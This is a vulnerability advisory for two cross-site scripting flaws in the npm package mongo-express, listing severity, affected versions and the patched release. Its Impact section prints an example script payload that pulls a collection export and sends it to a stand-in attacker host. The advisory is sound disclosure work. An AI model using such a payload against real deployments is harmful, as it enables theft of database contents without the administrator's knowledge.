GHSA-7p8h-86p5-wv3p
Suggest an improvement- Source
- https://github.com/advisories/GHSA-7p8h-86p5-wv3p
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-7p8h-86p5-wv3p/GHSA-7p8h-86p5-wv3p.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-7p8h-86p5-wv3p
- Aliases
- Related
- Published
- 2021-06-28T17:18:04Z
- Modified
- 2023-11-08T04:04:45.461858Z
- Severity
-
- 8.1 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N CVSS Calculator
- Summary
- Cross-site scripting
- Details
-
Two kinds of XSS were found:
- As mentioned in https://github.com/mongo-express/mongo-express/issues/577 when the content of a cell grows larger than supported size, clicking on a row will show full document unescaped, however this needs admin interaction on cell.
- Data cells identified as media will be rendered as media, without being sanitized. Example of different renders: image, audio, video, etc.
Impact
As an example of type 1 attack, an unauthorized user who only can send a large amount of data in a field of a document may use this payload:
{"someField": "long string here to surpass the limit of document ...... <script> await fetch('http://localhost:8081/db/testdb/export/users').then( async res => await fetch('http://attacker.com?backup='+encodeURIComponent((await res.text())))) </script>" }This will send an export of a collection to the attacker without even admin knowing. Other types of attacks such as dropping a database\collection are also possible.
Patches
Upgrade to
v1.0.0-alpha.4For more information
If you have any questions or comments about this advisory: * Open an issue in mongo-express * Email me at jafar.akhoondali@gmail.com
- Database specific
{ "nvd_published_at": "2021-06-21T19:15:00Z", "github_reviewed_at": "2021-06-21T17:53:12Z", "severity": "HIGH", "github_reviewed": true, "cwe_ids": [ "CWE-79" ] }- References
Affected packages
npm / mongo-express
Package
- Name
- mongo-express
- View open source insights on deps.dev
- Purl
- pkg:npm/mongo-express